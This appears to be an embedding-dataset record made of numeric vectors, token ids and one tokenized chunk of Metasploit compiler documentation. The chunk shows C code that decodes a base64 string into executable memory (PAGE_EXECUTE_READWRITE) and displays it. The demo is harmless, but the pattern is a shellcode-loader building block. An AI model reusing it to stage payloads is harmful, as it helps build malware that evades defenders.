-0.5475188493728638, -0.1680036038160324, -0.8415554165840149, -0.14949606359004974, -0.18348337709903717, -0.5718400478363037, -0.009391572326421738, 0.32005178928375244, -0.05272308364510536, -0.3134905695915222, -0.16478687524795532, -1.0019216537475586, -0.700054407119751, -0.3613313138484955, -0.5878692865371704, -0.13540908694267273, -1.3382405042648315, -0.5262399911880493, -0.6657002568244934, 0.34441280364990234, 0.8342971205711365, -0.10272729396820068, -0.0008608323987573385, -0.5758928060531616, -0.7373975515365601, -0.24380354583263397, -0.0955345556139946, -0.3283318877220154, 0.9527884721755981, 0.5607896447181702, -0.2063775509595871, 0.47383570671081543, -0.3740864396095276, 0.0026485128328204155, -0.18217922747135162, -0.15839096903800964, 0.3013506829738617, -0.1088448092341423, -0.5857027173042297, 0.14212186634540558, 0.11049632728099823, -0.852816641330719, -0.0921398177742958, -0.781116783618927, 0.44140222668647766, 0.23830032348632812, 0.12974919378757477, 0.06876379251480103, 0.756321370601654, 0.19644907116889954, -0.005951657425612211, 0.40474069118499756, 0.38104817271232605, 0.42561060190200806, 0.7875422835350037, -0.22950756549835205, 0.5749037265777588, 0.5974428057670593, -0.002196205547079444, 0.5378206372261047, -0.3945923447608948, -0.20221802592277527, 0.40441325306892395, -0.6397077441215515, 0.34984689950942993, -0.3377799093723297, -0.18074314296245575, 0.019672032445669174, 0.056757088750600815, 0.8556501269340515, -0.9458615779876709, -0.4536161720752716, -0.06403850018978119, -0.07749644666910172, 0.2614290714263916, -0.9488735795021057, -0.044169072061777115, 0.05291289463639259, -0.9275439977645874, 0.3025274872779846, -0.3396333158016205, -0.5201475024223328, -0.35873937606811523, -0.5988215208053589, -0.7264799475669861, -0.2256125658750534, -0.1275370717048645, -0.07825347036123276, -0.08377515524625778, -1.0962966680526733, 0.24455274641513824, -0.24911487102508545, 0.2546420097351074, 0.347349613904953, -0.8553417325019836, 0.4049132466316223, 0.9662999510765076, 0.2978839874267578, 0.10488926619291306, 0.22890187799930573, 0.14357911050319672, -0.518578052520752, 0.9922821521759033, -0.7626105546951294, 0.04262646287679672, -0.40751010179519653, 0.06535816937685013, -0.29559358954429626, 0.4350391626358032, 0.03144891560077667, -0.036354731768369675, -0.18950143456459045, -0.28108277916908264, 0.1284012496471405, 0.7629668116569519, 0.27162426710128784, 0.3538111746311188, 0.8308929800987244, 0.45119765400886536, 0.41028299927711487, -0.1704910844564438, -0.2076481729745865, 0.2690260708332062, -0.20029690861701965, 0.685936689376831, 0.6728026866912842, -0.7917714715003967, 0.8218727111816406, 0.03312055766582489, -0.9077988862991333, -0.2564517855644226, 0.11053649336099625, -0.12458137422800064, -0.06244944781064987, 0.40349283814430237, 0.36981359124183655, -0.2800283133983612, 0.029718996956944466, -0.4332854151725769, 0.3251594305038452, -0.25630685687065125, 0.40213409066200256, -0.9769035577774048, 0.09319441020488739, 0.6334377527236938, -0.3551742136478424, -0.061676569283008575, 0.6524530649185181, -0.5775532722473145, 1.1211251020431519, 0.4740922451019287, -0.6573671102523804, 0.7538965344429016, 0.6569125652313232, 0.6210821866989136, -0.11145498603582382, -0.08883281797170639, 0.5725340247154236, 0.5383776426315308, -0.7137912511825562, 0.7187649011611938, 0.34759068489074707, 0.4852810800075531, -0.6978256106376648, 0.191993847489357, -0.4261627495288849, -0.016146844252943993, -0.16307955980300903, 0.01757541112601757, -0.5787025690078735, -0.42678555846214294, 0.4948008954524994, -0.9173486232757568, 0.16912107169628143, -0.5748106241226196, -0.30089271068573, 0.791252613067627, 0.07185208052396774, -0.11918682605028152, 0.7333412170410156, -0.05269656330347061, 0.3449547588825226, 0.21541787683963776, 0.8875287771224976, 0.2787525951862335, 0.5516544580459595, 0.4046129286289215, -0.3929283618927002, 0.27733540534973145, 0.0940500870347023, -0.4717143774032593, -0.0926349014043808, 0.3751729726791382, -0.09481334686279297, 0.035783059895038605, -0.24079357087612152, -0.1507256180047989, 0.4449789524078369, 0.04947669059038162, -0.333868145942688, -0.3621909022331238, 0.32814130187034607, 0.13452193140983582, -0.8675973415374756, -0.064045250415802, 1.1986416578292847, 0.3877485394477844, 0.031945254653692245, -0.2881520986557007, -1.1417156457901, -0.27813395857810974, 0.19050291180610657, -1.0679293870925903, 0.20958134531974792, -0.7063357830047607, 0.06032061204314232, -0.37311312556266785, -0.6278096437454224, -0.15664950013160706, -0.30880850553512573, -0.06618345528841019, -0.35618239641189575, 0.5178612470626831, 0.36075738072395325, 0.34787818789482117, 0.3895653188228607, -0.373616099357605, -0.14138226211071014, 0.3884929418563843, 0.9484991431236267, 0.07343500107526779, 0.954383134841919, 0.613053560256958, -0.030705437064170837, 0.07082688063383102, -0.20037925243377686, 0.11856094747781754, -0.44858938455581665, -0.04286664351820946, -0.5247206687927246, -0.03057713806629181, -0.4052880108356476, -0.953575849533081, -0.40207210183143616, 0.9929723143577576, 0.06026314198970795, -0.04847189411520958, -0.7073394656181335, -0.2653539776802063, -0.991759717464447, -0.3441344201564789, -0.6287438273429871, -0.11509419232606888, -0.23329350352287292, -0.12462177872657776, 0.17723073065280914, -0.7946631908416748, 4.284516334533691, 0.640810489654541, 0.43100547790527344, 0.6366412043571472, 0.4815947413444519, 0.5656464099884033, -0.3845297396183014, -0.07004254311323166, -0.2192305326461792, -0.144012913107872, 0.4491829574108124, -0.03392842784523964, 0.27503448724746704, 0.86515873670578, -0.020152002573013306, 0.9770012497901917, -0.6803196668624878, -0.021566517651081085, 0.18711814284324646, -1.070338487625122, -0.9327585697174072, -0.28616565465927124, 0.06375060230493546, 0.7688111066818237, 0.5515815019607544, 0.12244642525911331, 0.5242798328399658, -0.4849277138710022, -0.15098552405834198, -0.32125964760780334, 0.6949918866157532, -0.47488638758659363, 0.20919503271579742, -0.42810481786727905, -0.8098354935646057, 0.6768416166305542, 0.06065129488706589, -0.16955561935901642, -0.1115059182047844, -0.17586635053157806, -0.074443019926548, -0.14652487635612488, -0.21177545189857483, 0.21892456710338593, -0.720073938369751, 0.5804527997970581, -0.37616974115371704, 0.6800014972686768, 0.5187045931816101, -0.3597486615180969, 0.32936862111091614, -0.0028763944283127785, 0.24008825421333313, -0.5438838601112366, -1.128715991973877, 0.07097341120243073, -0.618528425693512, 0.16083301603794098, -0.4869517385959625, 0.3362416923046112, 0.4232650697231293, 0.4739173650741577, -0.3764956295490265, 0.48505839705467224, -0.40269482135772705, 0.8327040076255798, 0.1587388962507248, 1.2219206094741821, -0.669880211353302, -0.5263505578041077, -0.3289324641227722, 0.41526705026626587, 0.03705085068941116, -0.4588744640350342, 0.28694647550582886, 0.447293758392334, 0.18815523386001587, 0.31153184175491333, 0.42317456007003784, -0.4624179005622864, 0.06811147928237915, -0.06346692889928818, 0.12387780100107193, -0.8128104209899902, 0.6201379895210266, 0.5625341534614563, -0.3867708146572113, -0.34615862369537354, -0.45486512780189514, -0.02287967875599861, 0.5548227429389954, 0.6583995223045349, -0.04661185294389725, -0.10651617497205734, -0.0923757553100586 ]
[ 1001, 2421, 1026, 2358, 20617, 1012, 1044, 1028, 20014, 2364, 1006, 11675, 1007, 1063, 20287, 7716, 9307, 20287, 7716, 1027, 7170, 29521, 19848, 2100, 1006, 1000, 7592, 1035, 2088, 1012, 21469, 2140, 1000, 1007, 1025, 2065, 1006, 20287, 7716, 1007, 1063, 6140, 2546, 1006, 1000, 7592, 1035, 2088, 1012, 21469, 2140, 8209, 1032, 1050, 1000, 1007, 1025, 1065, 2842, 1063, 6140, 2546, 1006, 1000, 4039, 2000, 7170, 7592, 1035, 2088, 1012, 21469, 2140, 1032, 1050, 1000, 1007, 1025, 1065, 1065, 2030, 2655, 1996, 3853, 1999, 9167, 2007, 2448, 19422, 2140, 16703, 1024, 2448, 19422, 2140, 16703, 3109, 1035, 2088, 1012, 21469, 2140, 1010, 5796, 2290, 6140, 2546, 1006, 1007, 4725, 2066, 6140, 2546, 1006, 1007, 2180, 1521, 1056, 2941, 6140, 2505, 1010, 2138, 2009, 1521, 1055, 2025, 4198, 2039, 2000, 2358, 26797, 2102, 1012, 2065, 2017, 2215, 2000, 2224, 6140, 2546, 1006, 1007, 2005, 2139, 8569, 12588, 5682, 1010, 5136, 2478, 6434, 3207, 8569, 5620, 18886, 3070, 1010, 2030, 4471, 8758, 1012, 7661, 20346, 28817, 14343, 20630, 1010, 1996, 18804, 6491, 10236, 4842, 2515, 2025, 2490, 7661, 20346, 2015, 2013, 2019, 15275, 3295, 1012, 2000, 2147, 2105, 2023, 1010, 2017, 2064, 2173, 2115, 20346, 2015, 1999, 2951, 1013, 20346, 2015, 1013, 3645, 1010, 1998, 2059, 5587, 2008, 5371, 2171, 1999, 5622, 2497, 1013, 18804, 13102, 4135, 4183, 1013, 7705, 1013, 21624, 1013, 20346, 2015, 1013, 3645, 1012, 1044, 1012, 3642, 6721, 3989, 11368, 3022, 24759, 28100, 1024, 1024, 7705, 1024, 1024, 21624, 6753, 27885, 25608, 10719, 2008, 6721, 10057, 3642, 2012, 1996, 3120, 3642, 2504, 1010, 1998, 2059, 4012, 22090, 1012, 2045, 2024, 2048, 4725, 2057, 2064, 2224, 1024, 18804, 13102, 4135, 4183, 1024, 1024, 7705, 1024, 1024, 21624, 1024, 1024, 3645, 1012, 4012, 22090, 1035, 6721, 1035, 4642, 12928, 13102, 4135, 4183, 1024, 1024, 7705, 1024, 1024, 21624, 1024, 1024, 3645, 1012, 4012, 22090, 1035, 6721, 1035, 1039, 1035, 2000, 1035, 5371, 11368, 3022, 24759, 28100, 1024, 1024, 7705, 1024, 1024, 21624, 1024, 1024, 3645, 1012, 4012, 22090, 1035, 6721, 1035, 1039, 1035, 2000, 1035, 5371, 2742, 1024, 5478, 1005, 5796, 2546, 1013, 4563, 1005, 5478, 1005, 18804, 13102, 4135, 4183, 1013, 7705, 1013, 21624, 1013, 3645, 1005, 1039, 1035, 3120, 1035, 3642, 1027, 1003, 1053, 1064, 1001, 2421, 1026, 3645, 1012, 1044, 1028, 20014, 2364, 1006, 1007, 1063, 9530, 3367, 25869, 1008, 4180, 1027, 1000, 7592, 2088, 1000, 1025, 9530, 3367, 25869, 1008, 2516, 1027, 1000, 7632, 1000, 1025, 4471, 8758, 1006, 1014, 1010, 4180, 1010, 2516, 1010, 16914, 1035, 7929, 1007, 1025, 2709, 1014, 1025, 1065, 1064, 2041, 8873, 2571, 1027, 1000, 1013, 1056, 8737, 1013, 7592, 11108, 1012, 4654, 2063, 1000, 3635, 1027, 3963, 1001, 2023, 3643, 2003, 2109, 2000, 5646, 2129, 6721, 1996, 3642, 4152, 1012, 18804, 13102, 4135, 4183, 1024, 1024, 7705, 1024, 1024, 21624, 1024, 1024, 3645, 1012, 4012, 22090, 1035, 6721, 1035, 1039, 1035, 2000, 1035, 5371, 1006, 2041, 8873, 2571, 1010, 1039, 1035, 3120, 1035, 3642, 1010, 3635, 1024, 3635, 1007, 102 ]
metasploit
127.txt
1
[CLS] description how to decode base64 with metasploit : : framework : : compilerthe metasploit c compiler has built - in support for base64 encoding and decoding, which is implemented as base64. h. code example # include < windows. h > # include < string. h > # include < base64. h > / / " hello world " encoded by rex : : text. encode _ base64 ( ) # define base64str " agvsbg8gd29ybgq = " int main ( ) { int base64strlen = strlen ( base64str ) ; lpvoid lpbuf = virtualalloc ( null, sizeof ( int ) * base64strlen, mem _ commit, page _ execute _ readwrite ) ; memset ( lpbuf,'\ 0 ', base64strlen ) ; base64decode ( lpbuf, base64str, base64strlen ) ; messagebox ( null, ( char * ) lpbuf, " base64 test ", mb _ ok ) ; return 0 ; } to compile, use how to use metasploit : : framework : : compiler : : windows to compile c code [SEP]
[ 0.3726879358291626, -0.7278072834014893, 0.31380918622016907, -0.050549160689115524, -0.25223565101623535, -0.5972856283187866, -0.21189366281032562, 0.3911959230899811, -0.1554907262325287, 0.6007977724075317, 0.057964880019426346, -0.36158260703086853, 0.09858096390962601, -0.00539063336327672, -0.5876069664955139, -0.21194836497306824, -0.07579538971185684, -0.4967406392097473, -0.7653878927230835, 0.46476927399635315, -0.04562392085790634, -0.44816505908966064, -1.4253498315811157, 0.14634361863136292, -0.5525098443031311, 0.14925338327884674, 0.47808006405830383, 0.05122063308954239, 1.0548304319381714, 0.5447060465812683, 0.15931591391563416, 0.2170793116092682, 0.7417662739753723, -1.3047800064086914, 0.2128940224647522, 0.011641035787761211, 0.7082087397575378, -0.10573562234640121, -0.5200679302215576, -0.501091718673706, -0.07557529956102371, 0.3394291400909424, 0.11859429627656937, -1.0164313316345215, -1.061677098274231, -0.9366011023521423, -0.00984166283160448, 0.3188009262084961, 0.39138031005859375, 0.5330390930175781, -0.17569191753864288, 0.4752940833568573, -0.02715030126273632, -1.2878061532974243, 0.3629385232925415, -0.18695959448814392, -0.3590223789215088, 0.1968774050474167, -0.6932952404022217, -0.18096040189266205, -0.11510467529296875, -0.19336660206317902, -0.2410016804933548, -0.7273756861686707, 0.2722443640232086, -0.1821814328432083, -0.2838838994503021, 0.04817259684205055, 0.053714729845523834, 0.03953724354505539, 0.1535203903913498, 0.33544009923934937, -0.8894522190093994, -0.8385064005851746, 0.09304852038621902, -0.08313686400651932, 0.25465071201324463, 0.6628404855728149, -0.4592825770378113, 0.7754168510437012, -0.3598293364048004, 0.6626120805740356, 0.7353588342666626, -0.9603416919708252, -0.48055416345596313, -1.5715950727462769, 0.36615270376205444, -0.38957804441452026, -1.2047991752624512, -0.5207467079162598, -0.11065905541181564, 0.4760062098503113, 0.24049676954746246, 0.30175670981407166, 0.08464264869689941, 0.9148679375648499, 0.14178548753261566, 0.1800827980041504, -0.8316063284873962, 0.44974076747894287, 0.048157788813114166, 0.8834882378578186, -0.5629908442497253, 0.581122875213623, 0.5811619758605957, 0.2060362696647644, 0.15664704144001007, 0.26161009073257446, -0.9132834076881409, -0.19253215193748474, 0.07701186835765839, -0.227290078997612, -0.034103117883205414, -0.4068816900253296, -0.03469362482428551, 0.2000514566898346, -0.1777237057685852, 0.2159041464328766, 0.35412585735321045, -0.04955831170082092, 0.34676238894462585, -0.2774556279182434, -0.16857077181339264, -0.2834376394748688, -0.3293217420578003, -0.1448407769203186, 0.4482966959476471, 0.5304015278816223, -0.8327715992927551, 0.046526990830898285, 0.2464277595281601, 0.3004418611526489, 0.00823761522769928, 0.3581952452659607, -0.15768469870090485, 1.1715869903564453, -0.05924978479743004, -0.5910793542861938, 1.0097899436950684, -0.02525952458381653, 0.23325905203819275, 0.16864658892154694, -0.3667405843734741, 0.9599799513816833, 0.2096545696258545, 0.31669551134109497, 0.0425422303378582, -0.23308022320270538, -0.6825846433639526, 0.2594600021839142, -0.07701041549444199, -0.35939690470695496, -0.1177208200097084, -0.06506215780973434, 0.9346452951431274, 0.4435736835002899, -0.823717474937439, 0.4715200364589691, -0.3033312261104584, 0.19149154424667358, -0.13622155785560608, 0.6138273477554321, -0.6469954252243042, 0.3030945062637329, -0.9748578071594238, 0.2222287356853485, -0.39615964889526367, -0.5447483658790588, -0.5891690850257874, -0.39254534244537354, 0.7817994356155396, -0.4569604694843292, 0.11121295392513275, 0.8128989338874817, 1.2665469646453857, 0.6616052985191345, -0.4564967453479767, 0.07622886449098587, 0.3779290020465851, 0.3009851276874542, 0.5968281626701355, 0.3771190345287323, -0.06852046400308609, 0.891238272190094, -0.34247708320617676, 0.07765151560306549, 0.6197291016578674, 0.22761018574237823, -0.7257394790649414, 0.3348759114742279, 0.6160593628883362, 0.6494510769844055, -0.17603866755962372, 0.8127458095550537, -0.3932449221611023, 0.04487115144729614, -1.0342986583709717, -0.438743531703949, -0.7371925115585327, -0.7707126140594482, -0.33443376421928406, 0.21548466384410858, -0.4323297142982483, 0.5904592275619507, -0.443255752325058, -0.2954825758934021, 0.7940555214881897, 0.5983151793479919, -0.1971983015537262, -0.26519471406936646, 0.4048740565776825, -0.5707851648330688, -0.315015584230423, 0.6725103855133057, 1.170487880706787, -0.4066696763038635, -0.45078009366989136, -0.041465017944574356, 0.3794447183609009, 0.852052628993988, 0.12452355772256851, 1.0018399953842163, 0.4110839366912842, 0.10265591740608215, -0.6298218369483948, -0.16172781586647034, 0.8023574948310852, 0.5769894123077393, 0.38908064365386963, 0.47674617171287537, 0.14873985946178436, 0.0005900294054299593, 0.1469942033290863, 0.3977929353713989, 0.36089208722114563, 0.2573589086532593, 0.6065008044242859, 1.29133939743042, -0.026872161775827408, 0.36539825797080994, -0.533190131187439, -0.25960615277290344, -0.5475760698318481, 0.13006006181240082, 0.7823294401168823, -0.15349432826042175, 0.04977333918213844, -0.4351070821285248, -0.2627449333667755, -0.442721962928772, -0.8332273364067078, 0.901313841342926, 0.7581229209899902, 0.03006509132683277, -0.6261960864067078, -0.7719247341156006, 0.9283865094184875, 0.7586742043495178, -1.3563206195831299, 0.037764549255371094, 0.7533811926841736, 0.18496251106262207, 0.0011196875711902976, 0.2179040014743805, 0.632193922996521, 0.8787579536437988, 1.2056496143341064, 0.0016889729304239154, -0.46852266788482666, -0.9831241369247437, 0.20588275790214539, -0.6188927888870239, -0.4970342218875885, 0.657285749912262, -0.5844274163246155, 0.07508533447980881, -0.19668251276016235, -0.44159939885139465, -0.45452144742012024, -0.3312890827655792, 0.5454891920089722, 0.07273292541503906, -0.07275138050317764, -0.1628739833831787, 0.22119823098182678, -0.8691860437393188, -0.09264566749334335, -0.07738513499498367, -0.11141368001699448, 0.47550442814826965, -0.24019572138786316, 0.8220404982566833, 0.2310735136270523, -0.27989670634269714, -0.2609802782535553, -0.9347591400146484, -0.2603726089000702, 0.10833585262298584, -0.08870778977870941, 0.5052629709243774, -0.726468026638031, 0.26756054162979126, -0.00932375993579626, 0.02034894935786724, -0.432405024766922, 0.6400207281112671, 0.00945767667144537, -0.29072341322898865, 0.1551658809185028, 0.7121328711509705, -0.49932947754859924, 1.224128007888794, 0.5658442378044128, 0.24895326793193817, -0.48600271344184875, 1.3088998794555664, 0.4881332516670227, 0.11596367508172989, -0.7307367920875549, -0.7614306211471558, -0.7842565774917603, -0.6138536930084229, -0.23014920949935913, -0.18952298164367676, -0.6358520984649658, 1.0283231735229492, -0.020554494112730026, -0.3676438331604004, -0.16159966588020325, -0.19027920067310333, 0.13735590875148773, 0.2629351019859314, 0.015488223172724247, 0.882677435874939, 0.4610773026943207, 0.726276695728302, -0.8089137673377991, 0.6811132431030273, 0.2077847719192505, -0.09763278812170029, -0.5768805742263794, -0.3949912488460541, 0.9833742380142212, 0.18015718460083008, -0.33128371834754944, 0.02956348843872547, 0.39171507954597473, 0.1749436855316162, 0.13218776881694794, -1.0152537822723389, 0.48332297801971436, -0.18380625545978546, 0.2373742163181305, 0.4964689016342163, 0.22882044315338135, 1.06074857711792, -0.8214091658592224, 0.7021652460098267, 0.08414337784051895, -0.2598968744277954, 0.8509448170661926, 0.1503528356552124, -0.8968791365623474, -0.018419750034809113, -0.06899098306894302, -0.5639362335205078, -0.5602088570594788, 1.459312915802002, 0.09217855334281921, -0.22111403942108154, 0.7506018877029419, -0.6450830101966858, -0.4448715150356293, 1.0410430431365967, -0.07287456095218658, -0.014799169264733791, 1.1335959434509277, -0.06826915591955185, 0.18874917924404144, -0.63902348279953, -0.2487105131149292, 0.10095226764678955, -0.18271999061107635, 0.5624834299087524, 0.24582922458648682, -0.22097648680210114, -0.44465187191963196, -0.7022297382354736, -0.4524785578250885, -0.36962464451789856, -0.2908783257007599, -0.5918273329734802, 0.5851187705993652, -1.020290493965149, -0.5300478935241699, -0.4328426718711853, 0.7311795353889465, 0.7747294306755066, 0.39937543869018555, 0.6049354076385498, 0.11670821905136108, 0.14768268167972565, 0.49202653765678406, 0.28381848335266113, -0.4594760537147522, 0.17115120589733124, 0.15683791041374207, 0.7520933151245117, -0.1616566777229309, 0.9336363077163696, -0.8354610204696655, 0.03400670364499092, -0.5068109631538391, 0.19440454244613647, -1.088000774383545, 0.03807869553565979, -0.29246604442596436, 0.5473452806472778, 0.4173046946525574, 0.41908714175224304, -0.5629806518554688, -0.13455736637115479, -0.4314574897289276, 0.04863479733467102, 0.40142709016799927, -0.4753780961036682, -0.38657450675964355, -0.37198755145072937, 0.15660345554351807, -0.077239491045475, 0.3671174943447113, 0.2669237554073334, -0.5479084849357605, -0.8249378204345703, -0.7605011463165283, 0.953141987323761, 0.6398875713348389, 0.2999781370162964, 0.3732955753803253, -1.3262884616851807, 0.3079603910446167, -1.113919973373413, 0.37689971923828125, 0.3572482466697693, 0.08440471440553665, -0.3536405861377716, 0.9655774235725403, 0.37738123536109924, -0.18107476830482483, -0.03688478097319603, 0.3354376554489136, -0.8963074088096619, -0.17207905650138855, -0.8450037240982056, 0.142670676112175, 0.05052156746387482, 0.28550997376441956, -0.5977953672409058, 0.45852985978126526, 0.015967531129717827, -0.6096717715263367, -0.8351922035217285, -0.05549006536602974, -1.1440428495407104, -0.5322125554084778, 0.8267123103141785, -0.12213161587715149, -0.3189471960067749, 1.2182257175445557, -0.0986529216170311, -0.20547832548618317, 0.4490155577659607, 0.25608786940574646, -0.5893340110778809, 0.24099886417388916, -0.33282771706581116, 0.5028570890426636, 0.052489276975393295, -0.14149616658687592, -0.05931353569030762, -0.44847235083580017, 1.3724617958068848, 0.335000604391098, -0.4053707420825958, 0.007938223890960217, -1.0591087341308594, 0.05690569058060646, -0.12273409962654114, 0.22601310908794403, -0.0285060815513134, 0.10516323894262314, -0.10622167587280273, 0.5381497740745544, -0.11349412798881531, -0.6014422178268433, -0.4437565505504608, 0.43445807695388794, -0.4237228035926819, 1.0502606630325317, 0.2835177481174469, 0.8376924991607666, -0.03214382752776146, -0.023669801652431488, -0.060349512845277786, -0.056385159492492676, 0.28034332394599915, -0.5508520603179932, 0.5039819478988647, -0.45889991521835327, 0.06061522662639618, -0.6795458793640137, 0.23741759359836578, -0.7091520428657532, 0.029940839856863022, 0.5391829609870911, 0.4666881561279297, 0.47020381689071655, -0.949370265007019, -0.8504225611686707, 0.6426848769187927, 0.6031942367553711, -0.34914177656173706, -0.15721064805984497, 0.1281977891921997, -0.1186932623386383, 0.9409790635108948, -0.12868158519268036, -0.11661684513092041, -0.36072713136672974, -0.4077709913253784, 0.35427218675613403, -0.5489264726638794, -0.6493530869483948, -0.9790850281715393, -1.1106728315353394, -0.43470489978790283, 0.8554832339286804, 0.3770444691181183, -1.2015469074249268, -0.5337063074111938, -0.5483837127685547, 0.4136577844619751, -0.9236809611320496, -0.3387359380722046, -0.47217315435409546, -0.20284214615821838, -0.5207469463348389, 1.1415883302688599, -0.4288215935230255, 0.043847713619470596, -0.37020343542099, 0.5023842453956604, 0.6570435166358948, 0.8688312768936157, -0.30460795760154724, -0.2946636974811554, 0.807471752166748, -0.0598219633102417, -0.47357234358787537, 0.047140587121248245, -0.9535837769508362, 0.8005664944648743, -0.11728988587856293, 0.5832094550132751, -0.6158519387245178, -0.15551002323627472, -0.7966558337211609, 0.6023373007774353, 0.66847825050354, -0.9187471866607666, 0.3615298271179199, -0.5709702372550964, 0.3764396905899048, 0.18230994045734406, -0.05625201016664505, 0.6205540299415588, 0.0830206349492073, -0.7377488613128662, -0.7397065162658691, 0.6747142672538757, 0.49927613139152527, -0.006099889520555735, 0.5627447366714478, -0.02742226980626583, 0.2841816544532776, -0.7898315787315369, 0.5568553805351257, 1.0039912462234497, -0.4295269846916199, -0.38589659333229065, -0.6206385493278503, 0.5877706408500671, 0.31443390250205994, -0.05504196882247925, 0.12590783834457397, 0.0751919150352478, -0.14933477342128754, -0.14585904777050018, -0.7171933054924011, -0.5070958733558655, -0.3828234076499939, -0.0845327079296112, 1.1797747611999512, -0.8716670274734497, 0.6874546408653259, 0.1819164752960205, -0.8950241804122925, -0.4741903245449066, -0.11062554270029068, -0.133027121424675, -0.09995660185813904, 0.02885705605149269, 0.8210196495056152, 0.6182696223258972, 0.47731921076774597, -0.9353039860725403, -0.49706149101257324, -0.8036561608314514, 0.9403713941574097, -0.05599137395620346, -0.42126715183258057, 1.0474038124084473, 0.32931360602378845, -0.4484251141548157, -0.46860483288764954, -0.8858149647712708, -0.1247229352593422, -0.5952662229537964, -0.47506988048553467, -0.34215790033340454, 0.08546388894319534, -0.2640168070793152, 0.07355446368455887, 0.14139452576637268, 0.521751880645752, -0.06611920148134232, 0.3599351644515991, 0.43791714310646057, 0.061127662658691406, 0.2090580016374588, 0.7459054589271545, -0.16878196597099304, -0.025920210406184196, -0.2613172233104706, 0.8260348439216614, -0.5551725029945374, 0.5280076861381531, 0.7827683687210083, 0.7507222294807434, 0.9765525460243225, 0.008589083328843117, -0.32581737637519836, 1.083939790725708, -0.0925370529294014, 0.5810347199440002, 0.2671756148338318, -0.871220588684082, -1.0319312810897827, 0.0506916306912899, -0.1873653382062912, -0.30239197611808777, 1.1237481832504272, -0.2359761744737625, 0.31771984696388245, 0.5663288831710815, 0.20409941673278809, -0.38376590609550476, -0.26968759298324585, 0.7592363357543945, -0.7960221171379089, -0.5627748370170593, -0.5716502070426941, -0.6634628176689148, 0.3856036961078644, -0.14690060913562775, -1.194717288017273, -0.6092059016227722, -0.9306639432907104, -0.3605123460292816, -0.031001372262835503, 0.368241548538208, -0.44074833393096924, -0.033884041011333466, -0.9830713272094727, -0.6071012020111084, -0.5911503434181213, -0.6701648235321045, -0.2855147123336792, -0.8314706683158875, -0.1321350485086441, -0.5787101984024048, -0.15114262700080872, 0.4086506962776184, -0.5187081694602966, 0.12141995131969452, -0.7592881321907043, -0.0765974149107933, -0.5042715072631836, 0.1691630780696869, 0.08408025652170181, 1.727339744567871, 0.5489689111709595, 0.29664283990859985, -0.5709184408187866, -0.3102901577949524, -0.4476781487464905, 0.2889443635940552, 0.2906641960144043, 0.1048421710729599, 0.493821382522583, -0.39635130763053894, -0.1503157764673233, 0.13123998045921326, -0.8878760933876038, 0.09745918214321136, -0.18334360420703888, 0.5283592343330383, 0.35955777764320374, 0.043063338845968246, 0.3995654284954071, 0.8621882200241089, -0.1880737841129303, -0.023454945534467697, -0.12653908133506775, -0.1369725614786148, 0.07315601408481598, 0.515699565410614, -0.2979828119277954, -0.49158477783203125, 0.2247587889432907, 0.3259170353412628, 0.06907281279563904, 0.25421735644340515, -0.13451915979385376, 0.026591403409838676, -0.8425436615943909, 0.29786956310272217, -0.15772242844104767, -0.4676591455936432, -0.4147053360939026, -0.5735563039779663, 0.36772075295448303, -0.5114681124687195, -0.5252017378807068, 0.285730242729187, -0.19934651255607605, -0.2623996138572693, -0.7481570243835449, -0.6170768737792969, 0.23244142532348633, -1.037314772605896, -0.17048807442188263, -0.3935554325580597, 0.11836401373147964, -0.07502390444278717, -0.20417535305023193, -0.04197624325752258, 0.4002170264720917, 0.5321915149688721, 0.037269335240125656, -0.0046957628801465034, -1.1283624172210693, -0.13809920847415924, -0.44511541724205017, 0.44722869992256165, -0.20599788427352905, -0.714938759803772, 0.5020057559013367, 0.659525990486145, -0.36597657203674316, 0.45413199067115784, -0.415800541639328, -0.8917670249938965, 0.2060042917728424, 0.4207627773284912, -0.6692076921463013, 0.6885244846343994, -0.6224852204322815, 0.49992525577545166, -0.4014095962047577, -0.017455510795116425, 0.1736840456724167, 0.37950265407562256, 0.01644156314432621, 0.042804885655641556, 0.03859352692961693, 0.5722606778144836, 0.2704571783542633, -0.4128839075565338, 0.8751762509346008, 0.47485315799713135, 0.11023178696632385, 0.5249982476234436, -0.19005270302295685, 0.527315080165863, 0.691095769405365, 1.08298659324646, 0.45401298999786377, -0.9980134963989258, 0.8538128733634949, -0.1480012983083725, -0.9462880492210388, -0.09664294868707657, 0.3920435607433319, 0.15894576907157898, 0.4106115996837616, -0.19716942310333252, 0.18103757500648499, -0.7277176976203918, 0.3307120203971863, -0.27005794644355774, 0.01618349365890026, -0.25683003664016724, -0.12177100032567978, -0.37305203080177307, -0.7081264853477478, 0.8381081819534302, 0.12838664650917053, -0.6302734613418579, 0.22385524213314056, -0.5107244253158569, 0.8939056396484375, 1.1717605590820312, -0.9127403497695923, -0.3950018882751465, 0.8428725004196167, 0.32048410177230835, -0.10011796653270721, -0.1677190512418747, -0.3762534260749817, 0.5293809175491333, 0.18395671248435974, 0.2565123438835144, -0.09809306263923645, 0.4751628041267395, -0.5105803608894348, -0.13454510271549225, -0.8535915613174438, 0.03862568363547325, -0.16540290415287018, -0.017700718715786934, 0.10748700052499771, 0.12781189382076263, 0.17312102019786835, -0.5227882862091064, 0.03126300871372223, -0.39244315028190613, -0.25349193811416626, 0.48594778776168823, -0.46050289273262024, 0.3944580554962158, 0.40382248163223267, 0.4399231970310211, -0.02907622791826725, 0.08942858129739761, 1.4581570625305176, 0.0801079124212265, 0.9549639225006104, -0.31848642230033875, -0.13769914209842682, 0.29260390996932983, -0.01691471040248871, -0.7760465145111084, -0.35751691460609436, 0.29742392897605896, 0.4509023129940033, -0.13278549909591675, -0.18797123432159424, -0.5095925331115723, 0.7244319319725037, 0.6189160943031311, 0.5961822271347046, -0.42158520221710205, 0.4938332438468933, -0.23084516823291779, -0.18039503693580627, 0.027175070717930794, 1.0340077877044678, -0.17085076868534088, 0.04336850717663765, -0.8071717023849487, -0.5840458273887634, -0.8959352374076843, -0.6726301908493042, -1.0624146461486816, 0.23439013957977295, -0.7280356287956238, -0.29664161801338196, -0.3412303328514099, -0.7498395442962646, -0.5906305313110352, 0.07109882682561874, -0.2004128098487854, 0.07391885668039322, 0.38415220379829407, 0.8030589818954468, 0.7754650712013245, 0.3378676176071167, -0.1436886042356491, -0.17374010384082794, 0.41993099451065063, 1.030626893043518, -0.2586468458175659, 1.0310176610946655, 0.4072315990924835, 0.7163403630256653, 0.2597730755805969, -0.24735955893993378, 0.5278661847114563, -0.009851759299635887, -0.2149391770362854, -0.5483432412147522, 0.25265640020370483, -0.5330043435096741, -0.9897767305374146, -0.05078066140413284, 1.148677945137024, -0.4453203082084656, -0.17333337664604187, -0.6570059657096863, -0.16769780218601227, 